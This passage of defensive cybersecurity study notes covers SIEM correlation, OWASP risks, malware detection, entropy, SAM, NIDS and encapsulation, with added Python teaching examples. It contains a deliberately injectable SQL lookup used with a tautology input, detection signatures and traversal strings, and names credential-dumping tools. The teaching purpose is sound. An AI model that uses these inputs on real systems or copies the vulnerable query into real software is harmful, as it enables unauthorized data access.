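    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")


def normalize(raw: str):
    """Map each source's format onto one schema: ts, src_ip, user, outcome, source."""
    if raw.startswith("{"):
        ev = json.loads(raw)
        return {"ts": datetime.fromisoformat(ev["TimeCreated"]),
                "src_ip": ev["IpAddress"], "user": ev["TargetUserName"],
                "outcome": "success" if ev["EventID"] == 4624 else "failure",
                "source": "windows-security"}
    m = SSHD_RE.match(raw)
    if m:
        return {"ts": datetime.fromisoformat(m["ts"]), "src_ip": m["ip"],
                "user": m["user"],
                "outcome": "success" if m["result"] == "Accepted" else "failure",
                "source": "sshd"}
    return None  # a real SIEM counts unparsed lines; silently dropping them hides gaps


def correlate(events, threshold=5, window=timedelta(seconds=60)):
    """Rule: >= threshold failed logons from one source IP within `window`,
    followed by a successful logon from the same IP (from any source)."""
    alerts = []
    recent_failures = defaultdict(list)  # src_ip -> failure timestamps inside the window
    for e in sorted(events, key=lambda e: e["ts"]):
        q = recent_failures[e["src_ip"]]
        while q and e["ts"] - q[0] > window:   # expire failures older than the window
            q.pop(0)
        if e["outcome"] == "failure":
            q.append(e["ts"])
        elif len(q) >= threshold:
            alerts.append({"rule": "brute-force-then-success", "src_ip": e["src_ip"],
                           "user": e["user"], "failures": len(q),
                           "success_source": e["source"], "ts": e["ts"].isoformat()})
            q.clear()
    return alerts


def run_pipeline(raw_lines):
    events = [ev for ev in map(normalize, raw_lines) if ev is not None]
    return correlate(events)
```

The success that fires the alert arrives from a different source (Windows, logon type 10 = RDP) than the failures (sshd), which is the whole point of normalising first: the rule only needs a common `src_ip` and `outcome` field and never sees the original formats. The two-failure sequence from 198.51.100.7 stays below the threshold and produces nothing.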

Benefits of SIEM:

- Real-Time Monitoring: Provides immediate visibility into security incidents as they happen.
- Threat Detection: Detects threats through log correlation and advanced analytics.
- Compliance: Helps maintain compliance by logging, auditing, and reporting security events.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Common Web Server Attack
OWASP Top 10
Malware Detection Method
- Signature Based
- Hash Signature
- Byte Signature
- Heuristic Based
- Static Technique
- Anomaly & Behavior Based
- Dynamic Technique
Steps to prevent after attack/ suspicious system
EDR
MDR
AMSI

1. Common Web Server Attacks

Web servers are frequent targets for attackers due to the sensitive data they process and the critical
services they provide. Some common attacks on web servers include:

Common Web Server Attacks:

1. SQL Injection: Attackers supply input that the application concatenates into an SQL query, so
the input is interpreted as SQL syntax rather than as data. This can lead to unauthorized data
access, modification, or deletion, and on some database engines to command execution on the host.
2. Cross-Site Scripting (XSS): Malicious scripts are injected into web pages that users view. These
scripts can steal session cookies or redirect users to malicious sites.
3. Cross-Site Request Forgery (CSRF): Attackers trick users into performing actions on a web
application without their consent by exploiting their authenticated session.
4. Denial of Service (DoS/DDoS): Attackers flood a web server with traffic, causing it to slow down
or crash, making the website unavailable to legitimate users.
5. Directory Traversal: Exploiting insufficient validation of user-supplied file paths (sequences
such as `../`, or their URL-encoded forms), attackers read files outside the web root directory,
such as configuration files or /etc/passwd.
6. Remote Code Execution (RCE): Attackers exploit server vulnerabilities to execute arbitrary code
on the server, potentially gaining control over the entire system.
7. File Inclusion Vulnerabilities: Attackers exploit vulnerabilities to include and execute
unauthorized files on the server, such as through Local File Inclusion (LFI) or Remote File
Inclusion (RFI).

2. OWASP Top 10

The OWASP Top 10 is a list of the most critical security risks for web applications, maintained by the
Open Web Application Security Project (OWASP). It helps developers, security professionals, and
organizations identify and mitigate common web security vulnerabilities.

OWASP Top 10 (2021):

1. Broken Access Control: Improperly enforced access controls allow attackers to bypass
authentication or authorization and access sensitive information or functions.
2. Cryptographic Failures: Insecure encryption practices that could expose sensitive data such as
passwords or credit card information.
3. Injection: Includes SQL, NoSQL, OS, and LDAP injection vulnerabilities where untrusted data is
sent to an interpreter, leading to code execution or data compromise.
4. Insecure Design: Lack of security design patterns and architectural practices that create
exploitable security flaws in software.
5. Security Misconfiguration: Misconfigurations in software, frameworks, or cloud infrastructure that
expose systems to vulnerabilities.
6. Vulnerable and Outdated Components: Using components with known vulnerabilities, such as
out-of-date libraries or frameworks.
7. Identification and Authentication Failures: Poor implementation of user authentication or session
management that allows attackers to impersonate users.
8. Software and Data Integrity Failures: Relying on software, updates, or data from untrusted
sources without verifying their integrity, which can lead to the introduction of malicious code.
9. Security Logging and Monitoring Failures: Lack of adequate logging or monitoring that can delay
the detection of security incidents.
10. Server-Side Request Forgery (SSRF): Attackers trick the server into sending requests to
unintended locations, often targeting internal systems.
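
Worked example (added to these notes, not from the original material): a small Python program that puts the injectable form of a user lookup next to the parameterized form, so the "Injection" item above and the SQL injection attack in the previous section can be seen rather than only described. The in-memory SQLite table, its rows, and the function names are constructed for the demonstration.

```python
import sqlite3

# Constructed in-memory user table standing in for a web application's database
# (added example; the rows are invented).
SAMPLE_USERS = [
    ("alice", "pbkdf2$constructed-hash-1"),
    ("bob", "pbkdf2$constructed-hash-2"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The injectable form: untrusted input is concatenated into the SQL text,
    so whatever the user types is parsed as part of the query."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The hardened form: the value is bound as a parameter and never becomes
    SQL syntax, so the same input is just a username that matches nothing."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def demo() -> dict:
    """Run both lookups against a normal username and the classic tautology
    input from the OWASP injection write-ups, and return the four results."""
    conn = make_db()
    benign = "alice"
    hostile = "x' OR '1'='1"
    return {
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        "vulnerable_hostile": lookup_vulnerable(conn, hostile),   # every row leaks
        "safe_benign": lookup_parameterized(conn, benign),
        "safe_hostile": lookup_parameterized(conn, hostile),      # no match
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20s} -> {rows}")
```

Run it and the vulnerable lookup returns every row for the tautology input while the parameterized lookup returns nothing; the fix works because the driver sends the value separately from the SQL text, so no quoting inside the input can change the query's structure.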

3. Malware Detection Methods

Malware detection can be categorized into several methods based on how malware is identified:

1. Signature-Based Detection:
a. Signature-Based Detection relies on identifying known malware by comparing files or
behaviors against a database of predefined signatures.
b. Hash Signature: A unique hash (e.g., MD5, SHA-256) of a file is created. If a file
matches a known malware hash, it is flagged as malicious.
c. Byte Signature: Sequences of bytes that are specific to a piece of malware are identified
and used to detect its presence. These are patterns found in the binary code of malware.
2. Heuristic-Based Detection:
a. Heuristic-Based Detection uses rules and algorithms to identify suspicious behaviors or
characteristics that are indicative of malware, even if the malware is previously unknown.
b. Static Technique: Analyzes the code or file without executing it. It looks at the structure
of the file, such as examining PE headers, strings, imports, and other attributes, to
predict whether it is malicious.
c. Dynamic Technique: Involves running the file in a controlled environment (sandbox) to
observe its behavior. It watches for actions like modifying files, changing registry keys, or
initiating network connections to identify if it’s malicious.
3. Anomaly-Based and Behavior-Based Detection:
a. Anomaly-Based Detection: Identifies deviations from normal behavior. For example, if a
system suddenly starts sending out large amounts of data or running unknown
processes, this might be flagged as suspicious.
b. Behavior-Based Detection: Monitors the behavior of programs and files in real-time. This
method focuses on the actions that malware takes (e.g., attempts to modify system files,
escalate privileges) rather than its code structure.
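
Worked example (added, not part of the original notes): a minimal scanner in Python that implements the two signature types above, a hash signature and a byte signature with a wildcard region, and shows why detection engines keep both. The "files", the signature names and the pattern are constructed for this illustration; no real malware or real signatures are involved.

```python
import hashlib
import re

# Constructed stand-ins for files on disk (added example; no real malware involved).
KNOWN_BAD_FILE = b"MZ\x90\x00" + b"CONSTRUCTED-SAMPLE-PAYLOAD" + b"\x00" * 32
VARIANT_FILE = KNOWN_BAD_FILE.replace(b"PAYLOAD", b"PAYL0AD")   # one byte changed
CLEAN_FILE = b"Hello, this is a harmless text document.\n"

# Hash signature database: the exact SHA-256 of a previously classified sample.
HASH_SIGNATURES = {
    hashlib.sha256(KNOWN_BAD_FILE).hexdigest(): "Constructed.Sample.A",
}

# Byte signature database: a byte sequence characteristic of the family, with
# wildcard regions so small edits to the sample do not break the match.
BYTE_SIGNATURES = {
    "Constructed.Sample.A.gen": re.compile(rb"MZ.{2}CONSTRUCTED-SAMPLE-.{7}", re.DOTALL),
}


def match_hash(data: bytes):
    """Exact match: any single-byte change produces a different digest."""
    return HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())


def match_bytes(data: bytes) -> list:
    """Pattern match: survives changes outside the signature or inside its wildcards."""
    return [name for name, pat in BYTE_SIGNATURES.items() if pat.search(data)]


def scan(data: bytes) -> dict:
    hash_hit = match_hash(data)
    byte_hits = match_bytes(data)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "hash_match": hash_hit,
        "byte_matches": byte_hits,
        "verdict": "malicious" if (hash_hit or byte_hits) else "clean",
    }


if __name__ == "__main__":
    for label, blob in (("known", KNOWN_BAD_FILE), ("variant", VARIANT_FILE), ("clean", CLEAN_FILE)):
        r = scan(blob)
        print(f"{label:8s} hash={r['hash_match']} bytes={r['byte_matches']} -> {r['verdict']}")
```

Changing a single byte of the sample defeats the hash signature but not the byte signature, which is the trade-off behind the heuristic and behavior-based methods that follow: the more a signature abstracts away from one exact file, the more variants it catches and the more care it needs to avoid false positives.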

4. Steps to Prevent After Attack/Suspicious System

Once an attack is detected, or a system is suspected of being compromised, immediate action is
necessary to minimize the damage and recover.

Steps to Prevent Further Damage After an Attack:

1. Isolate the Infected System: Disconnect the compromised system from the network to prevent
further spread of malware or lateral movement by the attacker.
2. Preserve Evidence: Avoid making changes to the system before collecting relevant logs,
memory dumps, and forensic evidence for analysis.
3. Conduct Root Cause Analysis: Identify the source of the attack, how the attacker gained entry,
and which vulnerabilities were exploited.
4. Remove Malware: Use antivirus/anti-malware tools, manual cleaning, or system restoration to
remove the malware from the affected systems.
5. Patch Vulnerabilities: Apply security patches or updates to fix the vulnerabilities that were
exploited during the attack.
6. Reset Credentials: Change all passwords, especially for privileged accounts, as they may have
been compromised.
7. Review Network Traffic: Look for any abnormal communication patterns and block malicious
IPs, domains, or ports used by the attackers.
8. Monitor for Persistence: Malware can use persistence techniques to remain active after system
reboots. Monitor for rogue services, registry keys, scheduled tasks, or startup programs.
9. Post-Incident Review: Conduct a thorough review of the attack to understand how it happened,
what was compromised, and what can be improved to prevent future incidents.

5. Endpoint Detection and Response (EDR)

EDR (Endpoint Detection and Response) is a security solution focused on continuous monitoring and
response to threats on endpoints (desktops, laptops, mobile devices, etc.). EDR tools detect suspicious
activity, provide real-time insights, and enable rapid responses to security incidents.

Key Features of EDR:

- Real-Time Monitoring: Continuously monitors endpoint activity to detect suspicious behavior and
potential threats.
- Threat Detection: Identifies both known and unknown threats using signature-based,
behavior-based, and heuristic analysis.
- Forensic Analysis: Provides detailed logs and data for analyzing incidents and conducting root
cause analysis.
- Automated Response: EDR tools can automatically contain and remediate threats (e.g.,
isolating infected machines or terminating malicious processes).

6. Managed Detection and Response (MDR)

MDR (Managed Detection and Response) is a service that provides advanced threat detection and
response capabilities by outsourcing security operations to a third-party provider. Unlike EDR, which is
a tool, MDR is a service where experts manage and monitor the security environment for an
organization.

Key Features of MDR:

- 24/7 Monitoring: MDR providers monitor your environment for security threats around the clock.
- Expertise: The service leverages the expertise of dedicated security analysts who investigate
alerts and incidents.
- Incident Response: MDR teams provide guidance or directly respond to incidents by containing
and mitigating threats.
- Threat Intelligence: MDR services typically include up-to-date threat intelligence, ensuring
detection of the latest and most sophisticated attacks.

7. Antimalware Scan Interface (AMSI)

AMSI (Antimalware Scan Interface) is a Microsoft API that provides a standard interface for applications
and services to integrate with antimalware solutions on Windows. It allows deep scanning of scripts,
macros, and other code by antivirus engines in real-time.

How AMSI Works:

1. Integration with Scripts: When scripts like PowerShell, JavaScript, or macros are executed,
AMSI passes the content to the antimalware software for scanning before execution.
2. Behavior-Based Detection: AMSI focuses on the behavior of the code (e.g., a PowerShell script
attempting to download a file) and can detect malicious actions dynamically.
3. Visibility into Obfuscated Code: AMSI helps detect malicious scripts even if they are obfuscated,
as it scans the de-obfuscated code during execution.

Benefits:

- Real-Time Protection: AMSI scans scripts at runtime, providing an additional layer of protection
against fileless malware and malicious scripts.
- Extended Coverage: It supports a wide range of script types, from PowerShell and VBScript to
JavaScript and macros embedded in Office documents.
---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Windows API
- user mode
- kernel mode
Dropper Downloader
Entropy
SAM - Windows Password stored database
TPM
IPS
- Honeypot

1. Windows API

The Windows API (Application Programming Interface) is a set of system calls that Windows
applications use to interact with the underlying operating system. It provides services such as file
access, process management, memory management, and communication between different programs.
Windows has two primary execution modes: user mode and kernel mode.

User Mode:

- Definition: User mode is a restricted mode where applications and user-level services run. In
user mode, processes are isolated from each other and from the core of the operating system to
prevent unintended interference or system crashes.
- Functionality:
- Applications in user mode cannot directly access hardware or critical system resources.
- If a user-mode application crashes, it generally doesn’t affect the entire operating
system.
- Communication with the operating system kernel happens via system calls, where the
application requests services from the kernel (such as file I/O or memory allocation).
- Examples: Web browsers, office applications, user-level processes like Task Manager,
and all user-installed software operate in user mode.

Kernel Mode:

- Definition: Kernel mode is a privileged mode that gives software unrestricted access to system
resources, including hardware components like memory, CPU, and devices. The operating
system kernel and core device drivers run in this mode.
- Functionality:
- Processes in kernel mode can execute any CPU instruction and reference any memory
address.
- Crashes in kernel mode can bring down the entire system (e.g., a "blue screen of
death").
- All requests from user mode are eventually handled in kernel mode.
- Examples: The Windows kernel, device drivers, and low-level system utilities operate in
kernel mode.

2. Dropper and Downloader

Dropper and Downloader are types of malware components used to deliver other malicious payloads.

Dropper:

- Definition: A dropper is a type of malware designed to "drop" (or install) other malicious
payloads onto the target system. The dropper itself may not perform malicious actions, but it
serves as a delivery mechanism for more harmful components, such as ransomware, trojans, or
keyloggers.
- Characteristics:
- Often disguised as legitimate software.
- Once executed, it extracts and installs additional malware from itself or downloads it
from a remote server.
- Droppers usually have obfuscation techniques to avoid detection by antivirus software.

Downloader:

- Definition: A downloader is a specialized form of dropper whose primary task is to fetch malware
from an external source (typically a remote server) after it has infected the system.
- Characteristics:
- Small in size and designed to establish a connection with the attacker's server to
download and execute further malware payloads.
- Used in the early stages of multi-stage attacks, where the initial infection is minimal to
avoid detection, and the heavier malicious payload is downloaded later.

3. Entropy

In the context of malware analysis, entropy is a measure of randomness or disorder within a file.
Entropy is used to determine whether a file is likely packed, encrypted, or obfuscated, which are
common techniques malware authors use to avoid detection.

High Entropy:

- Definition: A file with high entropy is more random and usually indicates that the file is
compressed or encrypted.
- Use in Malware Analysis: Many malware programs compress or encrypt their payloads to make
it harder for antivirus software to detect them. Entropy analysis helps analysts identify such
characteristics.

Low Entropy:

- Definition: A file with low entropy has more predictable and repetitive data, indicating that the file
is likely uncompressed or in plaintext.
- Example:
- High Entropy (Packed/Encrypted File): 7.9 out of 8.0 (close to randomness).
- Low Entropy (Plaintext/Executable File): 3.0 out of 8.0 (more structured data).
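
Worked example (added here; not from the original notes): Shannon entropy in bits per byte computed in Python, first over whole inputs and then over fixed-size windows, which is how an analyst locates an encrypted or packed region inside a file rather than judging the file as a whole. The sample file, the seeded pseudo-random blob that stands in for an encrypted payload, and the classification cut-offs are assumptions made for the demonstration.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for
    perfectly uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(entropy: float) -> str:
    """Coarse verdict; the cut-offs are an assumption for this example, not a standard."""
    if entropy >= 7.0:
        return "likely packed/encrypted"
    if entropy >= 5.5:
        return "mixed (typical compiled code)"
    return "plaintext/structured"


def high_entropy_regions(data: bytes, window: int = 1024, threshold: float = 7.0) -> list:
    """Slide a fixed window over the data and return (offset, entropy) for every
    window at or above the threshold. A whole-file score can hide an encrypted
    blob embedded in an otherwise ordinary file; the per-window view locates it."""
    hits = []
    for off in range(0, len(data), window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


# Constructed sample: 1024 bytes of text, 4096 bytes of seeded pseudo-random data
# standing in for an encrypted payload, then a short repetitive trailer.
HEADER = (b"# constructed plaintext configuration line\n" * 40)[:1024]
_rng = random.Random(7)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
TRAILER = b"END\n" * 64


def constructed_sample() -> bytes:
    return HEADER + RANDOM_BLOB + TRAILER


if __name__ == "__main__":
    sample = constructed_sample()
    whole = shannon_entropy(sample)
    print("whole file:", round(whole, 2), classify(whole))
    for off, e in high_entropy_regions(sample):
        print(f"  high-entropy window at offset {off}: {e} bits/byte")
```

The per-window scan reports only the four windows covering the pseudo-random blob; the plaintext header and the repetitive trailer score far lower, matching the 3.0 versus 7.9 contrast given above.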

4. SAM (Security Account Manager) - Windows Password Stored Database

The SAM (Security Account Manager) database is a file in Windows that stores hashed passwords for
local user accounts. It’s a critical component of the Windows operating system for managing user
authentication.

Location:

- The SAM file is located in the `C:\Windows\System32\config` folder and is inaccessible while
Windows is running because it’s locked by the system.

Functionality:

- Password Hashing: SAM stores passwords in hashed format using the NTLM (NT LAN
Manager) or LM (LAN Manager) hashing algorithms.
- Protected Storage: Windows encrypts the SAM file to prevent direct access, but attackers can
still extract it during boot or by using a tool like `pwdump` or `Mimikatz`.
- Pass-the-Hash Attack: If an attacker can retrieve the hashed passwords from the SAM file, they
can attempt a "pass-the-hash" attack, where they use the hash to authenticate without needing
to crack the actual password.

5. TPM (Trusted Platform Module)

TPM (Trusted Platform Module) is a specialized hardware chip designed to provide secure
cryptographic functions. TPM is used to enhance the security of computing devices by securely storing
sensitive data, such as encryption keys, credentials, or certificates.

Functions of TPM:

- Cryptographic Key Storage: TPM securely stores cryptographic keys, preventing unauthorized
access.
- Hardware-Based Authentication: The chip can be used for authentication purposes, such as
validating the identity of a system or user.
- Disk Encryption (e.g., BitLocker): In Windows, TPM works with BitLocker to provide
hardware-based encryption for drives, ensuring that decryption keys are protected from
tampering.
- Platform Integrity: TPM can measure and ensure the integrity of a system by verifying that
firmware and system components have not been altered.

Use in Security:

- Secure Boot: Ensures that the operating system has not been tampered with during the boot
process.
- Device Identification: Provides a unique ID for devices, improving security in environments
where device trust is important.

6. IPS (Intrusion Prevention System)

An IPS (Intrusion Prevention System) is a network security tool designed to detect and prevent threats
in real-time. It is similar to an IDS (Intrusion Detection System), but with the added ability to actively
block or mitigate threats.

How IPS Works:

- Traffic Monitoring: The IPS monitors network traffic for suspicious activity or known attack
patterns.
- Signature-Based Detection: Detects known threats based on signatures in its database, similar
to antivirus detection.
- Anomaly-Based Detection: Identifies unusual patterns in traffic that may indicate an attack, such
as unusual bandwidth usage or access attempts.
- Prevention/Blocking: When a threat is detected, IPS can block malicious traffic, reset
connections, or reconfigure network settings to prevent further exploitation.

7. Honeypot

A honeypot is a decoy system or network designed to lure attackers away from legitimate targets. It
mimics a vulnerable system, tricking attackers into interacting with it so that security professionals can
analyze their tactics and gather intelligence.

Types of Honeypots:

- Low-Interaction Honeypots: Simulate basic services and systems but do not provide a full
operating environment for the attacker.
- High-Interaction Honeypots: Mimic a full-fledged system, providing attackers with an
environment that looks and feels like a real network or application, allowing deep analysis of
their behavior.

Purpose:

- Threat Intelligence: Helps organizations understand new attack techniques, malware types, and
hacking strategies.
- Diversion: Diverts attackers from valuable assets to the honeypot, which is a controlled
environment.
- Vulnerability Discovery: Security professionals use honeypots to discover vulnerabilities that
attackers exploit.
---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
NIDS working
port mirroring
Open source tool & proprietary
WAZUH & YARA Rules integration
Encapsulation
Obfuscation

1. NIDS (Network Intrusion Detection System) Working

A Network Intrusion Detection System (NIDS) is a security system that monitors network traffic in
real-time to detect signs of malicious activity or policy violations. Unlike host-based systems, NIDS
focuses on network-level threats, examining traffic for suspicious patterns that may indicate an attack.

How NIDS Works:

1. Traffic Monitoring: NIDS passively monitors all incoming and outgoing network traffic by
analyzing packets in real-time.
2. Signature-Based Detection: NIDS compares network traffic against a database of known attack
signatures. If a packet matches a known signature (e.g., specific patterns for SQL injection or
DDoS attacks), it generates an alert.
3. Anomaly-Based Detection: This method involves detecting unusual traffic patterns that deviate
from the normal baseline of network activity. For example, if there’s a sudden spike in traffic or
unusual port activity, the NIDS will flag it as suspicious.
4. Heuristic Detection: NIDS may use heuristic methods to detect potential zero-day attacks or new
variants of known malware by analyzing packet behaviors that don’t fit predefined patterns but
are nonetheless suspicious.
5. Logging and Alerting: When NIDS identifies suspicious traffic, it generates an alert and logs the
details (source/destination IP, time, traffic type) for further investigation.
6. Placement in Network: NIDS is typically deployed in a network’s "choke points," such as
between internal and external networks (e.g., at the gateway or firewall), so it can monitor traffic
entering and leaving the network.

Advantages:
- Detects network-wide threats and attacks.
- Can monitor large-scale traffic patterns.

Limitations:
- Cannot inspect the contents of encrypted traffic, so attacks carried inside it go undetected
unless the traffic is decrypted before it reaches the sensor.
- It is a passive system and does not actively block traffic (unlike IPS).
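
Worked example (added, not from the original notes): a toy NIDS pass in Python that runs signature-based detection (regexes over payload) and anomaly-based detection (a per-source packet-size baseline) over a handful of constructed packets. Packet fields, signature names, the baseline rule and the traffic itself are invented for the illustration; the empty payloads on the port 443 flows show the encrypted-traffic limitation noted above.

```python
import re
import statistics
from dataclasses import dataclass


@dataclass
class Packet:
    """Minimal view of one packet as a sensor fed from a mirror port would see it."""
    src: str
    dst: str
    dport: int
    size: int      # bytes on the wire
    payload: str   # decoded application data; empty when the traffic is encrypted


# Signature database: named patterns matched against the payload (constructed).
SIGNATURES = {
    "web-sqli-union-select": re.compile(r"(?i)\bunion\s+(?:all\s+)?select\b"),
    "web-path-traversal": re.compile(r"\.\./"),
}


def signature_alerts(pkt: Packet) -> list:
    return [name for name, pat in SIGNATURES.items() if pat.search(pkt.payload)]


class Baseline:
    """Per-source packet-size profile learned from a window of normal traffic."""

    def __init__(self, training):
        sizes = {}
        for p in training:
            sizes.setdefault(p.src, []).append(p.size)
        self.stats = {src: (statistics.mean(s), statistics.pstdev(s)) for src, s in sizes.items()}

    def is_anomalous(self, pkt: Packet, k: float = 3.0) -> bool:
        """Flag a packet whose size is more than k standard deviations above this
        source's mean. Sources with no baseline are not judged by this rule."""
        if pkt.src not in self.stats:
            return False
        mean, sd = self.stats[pkt.src]
        return pkt.size > mean + k * max(sd, 1.0)


def analyze(packets, baseline: Baseline) -> list:
    """Logging and alerting step: one alert record per matching method and packet."""
    alerts = []
    for p in packets:
        for rule in signature_alerts(p):
            alerts.append({"method": "signature", "rule": rule,
                           "src": p.src, "dst": p.dst, "dport": p.dport})
        if baseline.is_anomalous(p):
            alerts.append({"method": "anomaly", "rule": "size-spike",
                           "src": p.src, "dst": p.dst, "dport": p.dport})
    return alerts


# Constructed traffic (not captured from a real network).
TRAINING = [Packet("10.0.0.5", "10.0.1.20", 443, s, "") for s in (500, 520, 480, 510, 490)]
LIVE = [
    Packet("10.0.0.5", "10.0.1.20", 443, 505, ""),     # normal size, encrypted: nothing to match
    Packet("10.0.0.5", "10.0.1.20", 443, 9000, ""),    # size spike from a known source
    Packet("10.0.0.9", "10.0.1.30", 80, 300, "GET /search?q=1 UNION SELECT 1,2"),
    Packet("10.0.0.9", "10.0.1.30", 80, 280, "GET /files?name=../../secret.txt"),
]


def demo() -> list:
    return analyze(LIVE, Baseline(TRAINING))


if __name__ == "__main__":
    for a in demo():
        print(a)
```

The signature rules fire only where there is plaintext to inspect; the oversized port 443 packet is caught purely by the baseline, which is the complementary role the anomaly method plays when payload inspection is impossible.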

2. Port Mirroring

Port mirroring, also known as SPAN (Switched Port Analyzer), is a technique used on network switches
to send copies of network packets from one port (or VLAN) to another port where it can be analyzed by
a network tool like a NIDS, Wireshark, or any packet analyzer.

How It Works:
- Configuration: Network administrators configure a switch to mirror traffic from one or multiple
ports to a designated mirror port. This mirror port is connected to the NIDS or another
monitoring tool.
- Traffic Analysis: Once the mirrored traffic reaches the monitoring port, the NIDS inspects the
traffic for any malicious activity or suspicious behavior without interfering with the live traffic.
- Use Case: Port mirroring is essential for passive network monitoring in NIDS, as it allows
security teams to analyze traffic without altering its flow.

Advantages:
- Non-intrusive traffic monitoring.
- No impact on the performance of live network traffic.

Disadvantages:
- Requires careful configuration to avoid overloading the mirror port with too much traffic.

3. Open Source Tools & Proprietary Tools

Open Source Tools:

Open-source security tools are software applications whose source code is freely available for
anyone to use, modify, and distribute. They are community-driven and provide flexibility and
transparency.

Advantages:
- No licensing fees; cost-effective.
- Strong community support and regular updates.
- Flexibility to customize according to specific needs.
- Examples:
- Snort: An open-source NIDS/IPS tool used for real-time traffic analysis.
- Wazuh: An open-source security monitoring and incident response tool.
- Wireshark: A widely used open-source packet analyzer for network
troubleshooting and analysis.

Proprietary Tools:
Proprietary security tools are developed and maintained by commercial organizations and
require a license to use. They often provide additional support, features, and integrations
compared to open-source alternatives.

Advantages:
- Professional support and maintenance.
- Often more user-friendly with polished interfaces.
- Enterprise-level features and integrations.
- Examples:
- Splunk: A proprietary SIEM (Security Information and Event Management) tool
for real-time monitoring and threat analysis.
- McAfee Network Security Platform: A commercial NIDS/IPS solution.
- Palo Alto Networks: Offers firewall, IPS, and network security solutions.

4. WAZUH & YARA Rules Integration

Wazuh is an open-source platform that provides security monitoring, threat detection, and incident
response. YARA is a tool designed to help malware researchers identify and classify malware samples
by creating rules to detect malicious patterns. Integrating Wazuh with YARA enables more effective
malware detection and response.

Wazuh and YARA Integration:

1. Wazuh collects system and application logs, file integrity data, and other security events across
endpoints.
2. YARA Rules: Wazuh can integrate YARA rules to scan files or processes for known malware
signatures, behavior patterns, or indicators of compromise (IOCs).
3. Real-Time Detection: When Wazuh detects suspicious files or activity, it can trigger YARA scans
to identify if the file or activity matches any predefined rules, alerting the security team of
potential threats.
4. Automated Response: Based on the results of YARA scans, Wazuh can generate alerts or
initiate automated actions, such as quarantining a file or escalating a threat to incident
response.

Use Cases:
- Malware Detection: Use YARA rules to detect known malware by scanning files on endpoints.
- Threat Hunting: YARA can help hunt for previously undetected threats by identifying patterns of
malicious activity.

5. Encapsulation

Encapsulation is a network concept in which data is wrapped within headers and footers to be sent
across a network. It occurs at various layers of the OSI model, where each layer adds its own control
information (headers) to ensure the data reaches its destination properly.

How Encapsulation Works:

- Process:
1. At the application layer, data is created.
2. The transport layer encapsulates the data by adding headers, including port numbers.
3. The network layer adds IP addresses for routing.
4. The data link layer adds MAC addresses.
5. The physical layer transmits the encapsulated data as bits over the network.
- Decapsulation: At the receiving end, each layer removes its respective header/footer in reverse
order, ensuring the data is interpreted correctly by the receiving application.
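
Worked example (added here, not part of the original notes): the five-step process above carried out in Python with struct, building a UDP datagram, wrapping it in an IPv4 header with a valid checksum, then in an Ethernet II frame, and decapsulating in reverse order while verifying each layer before trusting the next. Addresses, ports and MACs are constructed values; the IPv4 checksum routine follows RFC 1071.

```python
import socket
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over the IPv4 header (16-bit words)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def encapsulate(payload: bytes, src_ip: str, dst_ip: str, sport: int, dport: int,
                src_mac: str, dst_mac: str) -> bytes:
    """Wrap application data in UDP, then IPv4, then Ethernet headers (inner to outer)."""
    # Transport layer: UDP header carries the port numbers; checksum 0 means
    # "not computed", which IPv4 permits.
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    # Network layer: IPv4 header carries the addresses used for routing.
    total_len = 20 + len(udp)
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, total_len,     # version 4, IHL 5 words; DSCP/ECN 0
                         0x1234, 0x4000,         # identification; flags=DF, fragment offset 0
                         64, IPPROTO_UDP, 0,     # TTL, protocol, checksum placeholder
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", ip_checksum(ip_hdr)) + ip_hdr[12:]
    # Data link layer: Ethernet II header carries the MAC addresses; the physical
    # layer would then put these bytes on the wire as bits.
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip_hdr + udp


def decapsulate(frame: bytes) -> dict:
    """Peel the headers in reverse order, validating each layer before trusting the next."""
    dst_mac, src_mac = frame[:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    ip_hdr = ip[:ihl]
    if ip_checksum(ip_hdr) != 0:          # a header with a correct checksum sums to zero
        raise ValueError("bad IPv4 header checksum")
    _, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", ip_hdr[:20])
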